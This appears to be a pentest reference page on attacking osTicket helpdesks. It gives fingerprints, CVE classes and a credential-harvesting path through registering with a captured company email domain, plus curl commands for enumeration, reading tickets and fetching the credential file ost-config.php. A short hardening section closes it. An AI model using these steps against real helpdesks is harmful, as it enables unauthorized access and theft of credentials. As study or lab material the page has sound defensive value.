KagisoSec_
Service bank
WEB / APP 80/tcp 443/tcp

osTicket

PHP helpdesk system. The classic attack is sensitive-data exposure: register using a captured internal email domain to read tickets that contain credentials; ost-config.php holds DB creds.

web-app php helpdesk

Ports

PortProtoNotes
80tcpHTTP
443tcpHTTPS

Fingerprint

  • osTicket footer and version on the support pages
  • Staff control panel at /scp/login.php

Key files

PathHoldsSensitive
include/ost-config.php DB credentials and the secret salt sensitive

Default / weak creds

  • staff/agent accounts via reuse or weak passwords

Known CVEs

CVEImpact
version CVEsfile upload, SSRF and stored XSS in older releases

Exploitation primitives

  • Sensitive data exposure: if you control an email on the org domain, open a ticket and read replies, internal tickets often leak credentials
  • Account registration tied to a captured domain grants a portal session
  • Attachment upload and known-version vulnerabilities

Overview

osTicket is a support-ticket app. Its standout weakness is process, not memory corruption: tickets carry conversations, and those conversations carry secrets you can reach by registering with the right email domain.

Enumeration

Find the staff panel and version:

curl -sI http://<TARGET>/scp/login.php
curl -s http://<TARGET>/setup/doc/ -o /dev/null -w '%{http_code}\n'   # leftover /setup hints at version/misconfig

Sensitive-data exposure (the classic path)

osTicket’s standout weakness is process, not memory. If you control an inbox on the org’s email domain, the ticket system leaks internal conversations:

  1. From recon, get a valid org email domain (and an address you can receive mail for — sometimes the box is the mail server).
  2. Open a ticket / register from that address, then read staff replies and internal notes — they routinely contain credentials.
  3. Watch for an auto-generated ticket ID + email combo, which is the portal login.

Check the client portal for the reply:

curl -s "http://<TARGET>/view.php?id=<TICKET_ID>" -b "OSTSESSID=<cookie>"

Loot the config

Any file read (LFI, traversal, or a shell) gives DB creds + the secret salt:

curl -s http://<TARGET>/include/ost-config.php

Older releases (≤ 1.14/1.15) carry attachment-upload, SSRF and stored-XSS CVEs — fingerprint the version first and check it against the advisories before assuming the email path.

Hardening

Restrict self-registration, scope ticket visibility, patch promptly, and keep ost-config.php unreadable.

References